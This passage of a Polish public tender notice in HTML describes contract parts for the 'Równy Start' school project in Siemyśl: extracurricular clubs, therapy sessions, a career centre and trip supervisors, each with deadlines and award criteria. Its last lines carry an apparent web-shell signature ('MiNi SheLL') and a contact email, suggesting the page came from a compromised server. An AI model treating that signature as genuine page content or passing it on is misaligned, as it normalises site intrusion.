9)	dbałość o bezpieczeństwo uczniów na zajęciach, w czasie wyjazdów, wycieczek i obozów poprzez: zapewnienie im właściwej opieki, dokonywanie przeglądu sprzętu wykorzystywanego w ramach zajęć, opieki nad uczniami w trakcie przerw przed, po i w trakcie zajęć,10)aktywnie uczestniczenie w procesie monitoringu realizacji projektu: wypełnianie odpowiednich ankiet oraz zestawień..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Program i doświadczenie - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prowadzenie zajęć w formie kół zainteresowań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiając zaplanował prowadzenie zajęć w formie kół zainteresowań dla uczniów Zespołu Szkół im. Noblistów Polskich w Siemyślu. Są to: warsztaty informatyczne dla ucz. klas I-III szkoły podstawowej ( 54h, 1 grupa 20 ucz.),warsztaty informatyczne dla ucz. klas IV-VI szkoły podstawowej (54h,1 grupa 20 ucz.),warsztaty informatyczne dla ucz. gimnazjum( 54h,1 grupa 20 ucz.),zajęcia astronomiczne dla ucz. gimnazjum (54h zajęć, 30 h obserwacji,1 grupa 20 ucz.),warsztaty i obserwacje astronomiczne dla ucz. gimnazjum(10 warsztatów),zajęcia z fizyki dla ucz. gimnazjum(54h, 1 grupa 10 ucz.),zajęcia turystyczno -regionalne dla uczniów klas IV-VI szkoły podstawowej( 60h wycieczek w okresie wiosenno -jesiennym 2013/2014r, 20 osób), zajęcia chemiczno - biologiczne dla ucz.w gimnazjum(54h, 1 grupa 10 ucz.),zajęcia matematyczne dla ucz. klas I-III szkoły podstawowej (54 h,15 ucz.),zajęcia matematyczne dla ucz.klas IV-VI szkoły podstawowej (54 h, 15 ucz.),zajęcia matematyczne dla ucz. gimnazjum(54 h, 15 ucz.),zajęcia przyrodnicze dla ucz. klas I-III szkoły podstawowej(54 h, 15 ucz.),zajęcia przyrodnicze dla ucz. klas IV-VI szkoły podstawowej(54 h, 15 ucz.), zajęcia - eksperymenty doświadczalne (6 warsztatów 3-godzinnych), zajęcia teatralne dla ucz. gimnazjum
(54 h,15 ucz.),warsztaty teatralne( 4 warsztaty),zajęcia z języka niemieckiego dla ucz. klas IV-VI szkoły podstawowej(54 h, 20 ucz.),koło j. niemieckiego dla ucz. gimnazjum(54 h, 20 ucz.),koło j. angielskiego dla ucz. klas IV-VI szkoły podstawowej( 54 h, 20 ucz.),koło j. angielskiego dla ucz. gimnazjum(54 h, 20 ucz.)
 Zajęcia będą prowadzone  z zachowaniem indywidualnego podejścia do ucznia, z wykorzystaniem metod i technik aktywizujących i nowoczesnych pomocy dydaktycznych.  Celem  kół zainteresowań w ramach projektu Równy Start będzie:1.Poprawa wyników kształcenia, 2.	Wyrównywanie szans  i pomoc w przyswojeniu wiedzy,  3.Podniesienie atrakcyjności edukacyjnej i jakości kształcenia, 4.Rozwijanie zainteresowań uczniów, 5.	Rozwój własnych strategii uczenia się i podejmowania decyzji, 6.Rozwijanie umiejętności wyciągania wniosków i myślenia analitycznego i krytycznego, 7.Rozwijania umiejętności łączenia zdarzeń  w związki przyczynowo -skutkowe, 8.Wzbogacanie doświadczenia i rozwój kompetencji kluczowych, 9.Wykorzystywanie wiedzy w praktyce, wzrost motywacji i umiejętne korzystanie z dóbr kultury, 10.Wykorzystywanie wiedzy w praktyce
W czasie realizacji projektu Równy Start uczniowie Zespołu Szkół im. Noblistów Polskich w Siemyślu poszerzać będą swoją wiedzę i umiejętności uczestnicząc w wielu obozach, wyjazdach, wycieczkach. 
Zajęcia dydaktyczne pozalekcyjne odbywać się będą po zakończeniu nauki wynikającej z planu lekcji obowiązkowych zajęć. Wykonawca będzie dyspozycyjny w godz. 13:00-16:30 ( chyba, że plan nauki programowej umożliwi realizację zadań w innym czasie).Zajęcia dydaktyczne pozalekcyjne będą prowadzone z wykorzystaniem metod aktywizujących - min. 40% . Wykonawcy, w ramach realizacji zadania, są zobowiązani do wykonywania następujących czynności:1)zapoznanie się z dysfunkcjami, predyspozycjami oraz zainteresowaniami osób uczęszczających na zajęcia pozalekcyjne,2)	opracowanie szczegółowych programów zajęć pozalekcyjnych z zastosowaniem metod aktywizujących, 3)	weryfikacja szczegółowego programu zajęć we współpracy z koordynatorem ds. merytorycznych projektu,4)	przygotowanie niezbędnych zestawień danych o Beneficjentach,5)	realizacja ustalonego programu zajęć oraz wspieranie uczniów,6)kreowanie atmosfery na zajęciach sprzyjającej twórczej pracy oraz wyzbywaniu się kompleksów wynikających z dysproporcji w osiągnięciach edukacyjnych,7)regularne wypełnianie dokumentacji,8)informowanie Grupy Zarządzającej o wszelkich trudnościach w realizacji projektu oraz współpraca przy ich niwelowaniu, 9)	dbałość o bezpieczeństwo uczniów na zajęciach, w czasie wyjazdów, wycieczek i obozów poprzez: zapewnienie im właściwej opieki, dokonywanie przeglądu sprzętu wykorzystywanego w ramach zajęć, opieki nad uczniami w trakcie przerw przed, po i w trakcie zajęć,10)aktywnie uczestniczenie w procesie monitoringu realizacji projektu: wypełnianie odpowiednich ankiet oraz zestawień..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Program i doświadczenie - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prowadzenie zajęć terapeutycznych : psychologiczno - pedagogicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający zaplanował dla uczniów Zespołu Szkół im. Noblistów Polskich w Siemyślu zajęcia   terapeutyczne : psychologiczno - pedagogicznych zajęcia terapeutyczne dla ucz. klas I-III szkoły podstawowej(54 h,16 ucz.),zajęcia terapeutyczne dla ucz. klas IV-VI szkoły podstawowej(54 h,16 ucz.)zajęcia terapeutyczne dla ucz. gimnazjum( 54 h,16 ucz.)
 Zajęcia będą prowadzone  z zachowaniem indywidualnego podejścia do ucznia, z wykorzystaniem metod i technik aktywizujących i nowoczesnych pomocy dydaktycznych.  Celem  zajęć terapeutycznych w ramach projektu Równy Start będzie:1.	Wyrównywanie szans  2.Podniesienie atrakcyjności edukacyjnej i jakości kształcenia, 3.Rozwijanie zainteresowań uczniów 4.Likwidacja problemów w funkcjonowaniu uczniów w społeczności szkolnej, 5.	Rozwój własnych strategii uczenia się i podejmowania decyzji, 6.Rozwijanie umiejętności wyciągania wniosków i myślenia analitycznego i krytycznego, 7.Rozwijania umiejętności łączenia zdarzeń  w związki przyczynowo -skutkowe, 8.Wzbogacanie doświadczenia i rozwój kompetencji kluczowych, 9.Wykorzystywanie wiedzy w praktyce, wzrost motywacji 
Zajęcia dydaktyczne pozalekcyjne odbywać się będą po zakończeniu nauki wynikającej z planu lekcji obowiązkowych zajęć. Wykonawca będzie dyspozycyjny w godz. 13:00-16:30 ( chyba, że plan nauki programowej umożliwi realizację zadań w innym czasie).Zajęcia dydaktyczne pozalekcyjne będą prowadzone z wykorzystaniem metod aktywizujących - min. 40% . Wykonawcy, w ramach realizacji zadania, są zobowiązani do wykonywania następujących czynności:1)zapoznanie się z dysfunkcjami, predyspozycjami oraz zainteresowaniami osób uczęszczających na zajęcia pozalekcyjne,2)	opracowanie szczegółowych programów zajęć pozalekcyjnych z zastosowaniem metod aktywizujących, 3)	weryfikacja szczegółowego programu zajęć we współpracy z koordynatorem ds. merytorycznych projektu,4)	przygotowanie niezbędnych zestawień danych o Beneficjentach,5)	realizacja ustalonego programu zajęć oraz wspieranie uczniów,6)kreowanie atmosfery na zajęciach sprzyjającej twórczej pracy oraz wyzbywaniu się kompleksów wynikających z dysproporcji w osiągnięciach edukacyjnych,7)regularne wypełnianie dokumentacji,8)informowanie Grupy Zarządzającej o wszelkich trudnościach w realizacji projektu oraz współpraca przy ich niwelowaniu, 9)	dbałość o bezpieczeństwo uczniów na zajęciach, w czasie wyjazdów, wycieczek i obozów poprzez: zapewnienie im właściwej opieki, dokonywanie przeglądu sprzętu wykorzystywanego w ramach zajęć, opieki nad uczniami w trakcie przerw przed, po i w trakcie zajęć,10)aktywnie uczestniczenie w procesie monitoringu realizacji projektu: wypełnianie odpowiednich ankiet oraz zestawień..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Program i doświadczenie - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolny Ośrodek Kariery Zawodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający zaplanował prowadzenie dla uczniów Zespołu Szkół im. Noblistów Polskich w Siemyślu prowadzenie zajęć Szkolnego Ośrodka Kariery Zawodowej ( 32h, 68 ucz.)
 Zajęcia będą prowadzone  z zachowaniem indywidualnego podejścia do ucznia, z wykorzystaniem metod i technik aktywizujących i nowoczesnych pomocy dydaktycznych.  Celem  zajęć SOKZ w ramach projektu Równy Start będzie: 1.	Wyrównywanie szans, 2.Podniesienie atrakcyjności edukacyjnej i jakości kształcenia, 3.Rozwijanie zainteresowań uczniów, 4.Rozwój własnych strategii uczenia się i podejmowania decyzji, 5.Rozwijanie umiejętności wyciągania wniosków i myślenia analitycznego i krytycznego, 6.Rozwijania umiejętności łączenia zdarzeń  w związki przyczynowo -skutkowe, 9Wzbogacanie doświadczenia i rozwój kompetencji kluczowych, 8.Wykorzystywanie wiedzy w praktyce, wzrost motywacji , 9.Poznanie predyspozycji zawodowych i pomoc w wyborze dalszej ścieżki zawodowej, 10.Wykorzystywanie wiedzy w praktyce
W czasie realizacji projektu Równy Start uczniowie Zespołu Szkół im. Noblistów Polskich w Siemyślu poszerzać będą swoją wiedzę i umiejętności uczestnicząc w wielu  wycieczkach do zakładów pracy. 
Zajęcia dydaktyczne pozalekcyjne odbywać się będą po zakończeniu nauki wynikającej z planu lekcji obowiązkowych zajęć. Wykonawca będzie dyspozycyjny w godz. 13:00-16:30 ( chyba, że plan nauki programowej umożliwi realizację zadań w innym czasie).Zajęcia SOKZ będą prowadzone z wykorzystaniem metod aktywizujących - min. 40% . Wykonawcy, w ramach realizacji zadania, są zobowiązani do wykonywania następujących czynności:1)zapoznanie się z dysfunkcjami, predyspozycjami oraz zainteresowaniami osób uczęszczających na zajęcia pozalekcyjne,2)	opracowanie szczegółowych programów zajęć pozalekcyjnych z zastosowaniem metod aktywizujących, 3)	weryfikacja szczegółowego programu zajęć we współpracy z koordynatorem ds. merytorycznych projektu,4)	przygotowanie niezbędnych zestawień danych o Beneficjentach,5)	realizacja ustalonego programu zajęć oraz wspieranie uczniów,6)kreowanie atmosfery na zajęciach sprzyjającej twórczej pracy oraz wyzbywaniu się kompleksów wynikających z dysproporcji w osiągnięciach edukacyjnych,7)regularne wypełnianie dokumentacji,8)informowanie Grupy Zarządzającej o wszelkich trudnościach w realizacji projektu oraz współpraca przy ich niwelowaniu, 9)	dbałość o bezpieczeństwo uczniów na zajęciach, w czasie wyjazdów do zakładów pracy, poprzez: zapewnienie im właściwej opieki, dokonywanie przeglądu sprzętu wykorzystywanego w ramach zajęć, opieki nad uczniami w trakcie przerw przed, po i w trakcie zajęć,10)aktywnie uczestniczenie w procesie monitoringu realizacji projektu: wypełnianie odpowiednich ankiet oraz zestawień..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Program i doświadczenie - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie usług opiekunów- kierowników w czasie wyjazdów, obozów i wycieczek organizowanych dla  uczniów Zespołu Szkól im. Noblistów Polskich w Siemyślu,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uczniowie Zespołu Szkół im. Noblistów Polskich w Siemyślu poszerzać będą swoją wiedzę i umiejętności uczestnicząc w wielu obozach, wyjazdach, wycieczkach.Aby zapewnić bezpieczeństwo uczniom w czasie wycieczek, wyjazdów i obozów Zamawiający  określił opiekunów - kierowników do wykonania tego zadnia: 
Opiekun- kierownik w czasie wycieczki do  Torunia - maj 2013,  Opiekun- kierownik w czasie wycieczki do Krakowa/ Częstochowy/ Oświęcimia - sierpień 2013, 
opiekun - kierownik w czasie wycieczki do Białowieży -maj 2014, opiekun- kierownik w czasie wycieczki do Stralsundu - czerwiec 2013, opiekun- kierownik w czasie obozów językowych: letniego - sierpień 2013 i zimowego - luty 2014, opiekun- kierownik w czasie wyjazdów do Ośrodka Edukacji Ekologicznej- 13 wyjazdów do OEE - kwiecień, maj, czerwiec, wrzesień, październik 2013r, kwiecień, maj, czerwiec 2014 
opiekun- kierownik w czasie wycieczek rowerowych -  60h w okresie wiosenno -jesiennym 2013/2014r, opiekun - kierownik w czasie wyjazdów na Koszaliński Uniwersytet Dziecięcy - 13  wyjazdów raz w miesiącu marzec- czerwiec, październik- grudzień  2013r; styczeń- czerwiec 2014r, opiekun - kierownik w czasie dodatkowych odwozów po zajęciach w ramach projektu -  2h w tygodniu ( 54 tygodnie).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie - 60</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com